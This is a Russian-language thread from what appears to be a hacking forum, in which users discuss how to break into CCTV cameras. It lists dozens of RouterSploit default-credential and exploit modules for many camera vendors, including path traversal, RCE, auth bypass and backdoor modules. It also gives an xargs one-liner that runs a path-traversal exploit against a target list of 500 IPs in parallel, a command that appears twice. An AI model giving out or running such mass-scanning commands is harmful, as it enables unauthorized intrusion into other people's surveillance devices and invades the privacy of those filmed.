• XSS.stack #1 – первый литературный журнал от юзеров форума

Можно и как взломать камеру видео наблюдения.

Зависит от камер,
посмотри тут https://github.com/threat9/routersploit

creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ssh_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/cisco/ftp_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ssh_default_creds
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/jovision/jovision_credentials_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/P2P_wificam_rce
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/cisco/video_surv_path_traversal
exploits/cameras/mvpower/dvr_jaws_rce
не подскажете как указать не одну цель, а выгрузить список адресов?
 
можно использовать xargs
что-то вроде

xargs -a targets.txt -n 1 -P 500 -I % ~/routersploit/rsf.py -m exploits/cameras/xiongmai/uc_httpd_path_traversal -s "target %" -s "verbosity false" >> result.txt


-a targets.txt - список ip адресов
-n 1 -P 500 - параллельно 500 адресов
~/routersploit/rsf.py - путь к routersploit
-m exploits/cameras/xiongmai/uc_httpd_path_traversal - имя модуля
-s "target %" -s "verbosity false" - параметры для модуля, вместо % xargs поставит ip из списка
>> result.txt - куда писать результат
 
можно использовать xargs
что-то вроде

xargs -a targets.txt -n 1 -P 500 -I % ~/routersploit/rsf.py -m exploits/cameras/xiongmai/uc_httpd_path_traversal -s "target %" -s "verbosity false" >> result.txt


-a targets.txt - список ip адресов
-n 1 -P 500 - параллельно 500 адресов
~/routersploit/rsf.py - путь к routersploit
-m exploits/cameras/xiongmai/uc_httpd_path_traversal - имя модуля
-s "target %" -s "verbosity false" - параметры для модуля, вместо % xargs поставит ip из списка
>> result.txt - куда писать результат
спасибо
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх